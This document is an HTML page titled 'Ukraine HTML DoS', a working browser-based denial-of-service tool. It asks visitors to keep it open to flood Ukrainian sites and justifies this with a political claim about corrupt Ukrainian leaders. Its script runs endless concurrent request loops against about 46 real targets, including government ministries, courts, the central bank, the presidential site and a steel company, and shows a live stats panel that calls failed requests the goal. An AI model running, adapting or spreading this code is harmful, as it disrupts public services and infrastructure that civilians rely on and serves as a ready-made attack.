<!DOCTYPE html>
<html>

<head>
    <meta charset="utf-8">
    <title>Ukraine HTML DoS</title>
    <link rel="stylesheet" href="style.css">
</head>
<body>
    <p></p>
    <h1 class="title">Ukraine HTML DoS</h1>
    <ul>
        <li>
            <h3>English version</h3>
            <p class="sub">For security concerns, you are able to simply save the webpage, and run locally - as well as
                view the
                source. It
                is
                entirely HTML and browser interpreted.</p>
            <p class="sub">The leaders of ukraine are corrupt and we have to stop them</p>
            <p class="sub">Please, just open this page and let it be open on your devices, it will flood the web-sites
                and pose a
                huge load
                on
                their infrastructure</p>
        </li>
        <li>
            <h3 class="sub"></h3>
            <p class="sub"></p>
            <p class="sub"></p>
        </li>
        <li>
            <h3 class="sub"></h3>
            <p class="sub"></p>
            <p class="sub"></p>
        </li>

    </ul>
    
    <h3 class="desc">Here is the stats of your session (the links and the number of the requests that were sent from
        your
        browser):<br>
        Failed to fetch is normal - if any site has that - that means their servers are under load and are dropping
        packets - which is the goal!</h3>
    <div id="stats" class="stats">
        <pre>{
        "https://ukraine.ua/": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://court.gov.ua/": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://nazk.gov.ua": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://okhtyrkamr.gov.ua/": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://snriu.gov.ua/": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://obuhivrda.gov.ua/": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://dsp.gov.ua/": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://nlmk.com": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://thedigital.gov.ua/": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://cip.gov.ua": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://hsc.gov.ua": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://ird.gov.ua/": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://mkip.gov.ua/": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "http://naas.gov.ua/": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://loda.gov.ua/": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://ombudsman.gov.ua/": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://mfa.gov.ua/": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://spravdi.gov.ua/": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://bank.gov.ua/": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://olexrada.gov.ua/": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://hsc.gov.ua/": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://znaimo.gov.ua/": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://kr.gov.ua/": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://mkrada.gov.ua/": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://diia.gov.ua/": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://cvk.gov.ua/": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://naqa.gov.ua/": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://imr.gov.ua/": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "http://nbuviap.gov.ua/": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://testportal.gov.ua/": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://kga.gov.ua/": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://nrcrm.gov.ua/": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://zpr.hsc.gov.ua": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://www.rnbo.gov.ua": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://www.president.gov.ua/": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://tripadvisor.mfa.gov.ua/": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://vue.gov.ua/": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://bs.dp.court.gov.ua/": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "http://www.kovelrada.gov.ua/": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://www.hniise.gov.ua/": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://bank.gov.ua/": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://an.dp.court.gov.ua/": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://mfa.gov.ua/": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://ml.od.court.gov.ua/": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://cnap.mlt.gov.ua/": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://www.nssmc.gov.ua/": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        }
    }</pre>
    </div>
    <div id="errors"></div>
    <h1>If you missed it, BBC NEWS: Ukraine conflict: <a href="https://www.bbc.com/news/world-europe-60503037">Russian
            forces attack from three sides</a></h1>
    <script>
        var targets = {
            'https://ukraine.ua/': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://court.gov.ua/': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://nazk.gov.ua': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://okhtyrkamr.gov.ua/': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://snriu.gov.ua/': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://obuhivrda.gov.ua/': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://dsp.gov.ua/': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://nlmk.com': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://thedigital.gov.ua/': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://cip.gov.ua': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://hsc.gov.ua': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://ird.gov.ua/': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://mkip.gov.ua/': { number_of_requests: 0, number_of_errored_responses: 0 },
            'http://naas.gov.ua/': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://loda.gov.ua/': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://ombudsman.gov.ua/': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://mfa.gov.ua/': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://spravdi.gov.ua/': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://bank.gov.ua/': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://olexrada.gov.ua/': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://hsc.gov.ua/': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://znaimo.gov.ua/': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://kr.gov.ua/': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://mkrada.gov.ua/': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://diia.gov.ua/': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://cvk.gov.ua/': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://naqa.gov.ua/': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://imr.gov.ua/': { number_of_requests: 0, number_of_errored_responses: 0 },
            'http://nbuviap.gov.ua/': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://testportal.gov.ua/': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://kga.gov.ua/': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://nrcrm.gov.ua/': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://zpr.hsc.gov.ua': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://www.rnbo.gov.ua': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://www.president.gov.ua/': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://tripadvisor.mfa.gov.ua/?page_id=4629': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://vue.gov.ua/': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://bs.dp.court.gov.ua/': { number_of_requests: 0, number_of_errored_responses: 0 },
            'http://www.kovelrada.gov.ua/': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://www.hniise.gov.ua/': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://bank.gov.ua/': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://an.dp.court.gov.ua/': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://mfa.gov.ua/': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://ml.od.court.gov.ua/': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://cnap.mlt.gov.ua/': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://www.nssmc.gov.ua/': { number_of_requests: 0, number_of_errored_responses: 0 },

       }

        var statsEl = document.getElementById('stats');
        function printStats() {
            statsEl.innerHTML = '<pre>' + JSON.stringify(targets, null, 2) + '</pre>'
        }
        setInterval(printStats, 100);

        var CONCURRENCY_LIMIT = 200
        var queue = []

        async function fetchWithTimeout(resource, options) {
            const controller = new AbortController();
            const id = setTimeout(() => controller.abort(), options.timeout);
            return fetch(resource, {
                signal: controller.signal
            }).then((response) => {
                clearTimeout(id);
                return response;
            }).catch((error) => {
                clearTimeout(id);
                throw error;
            });
        }

        async function flood(target) {
            while (true) {
                if (queue.length > CONCURRENCY_LIMIT) {
                    await queue.shift()
                }
                queue.push(
                    fetchWithTimeout(target, { timeout: 1000 })
                        .catch((error) => {
                            if (error.code === 20 /* ABORT */) {
                                return;
                            }
                            targets[target].number_of_errored_responses++;
                            targets[target].error_message = error.message
                        })
                        .then((response) => {
                            if (response && !response.ok) {
                                targets[target].number_of_errored_responses++;
                                targets[target].error_message = response.statusText
                            }
                            targets[target].number_of_requests++;
                        })


                )
            }
        }

        //Start
        Object.keys(targets).map(flood)
    </script>
</body>
</html>
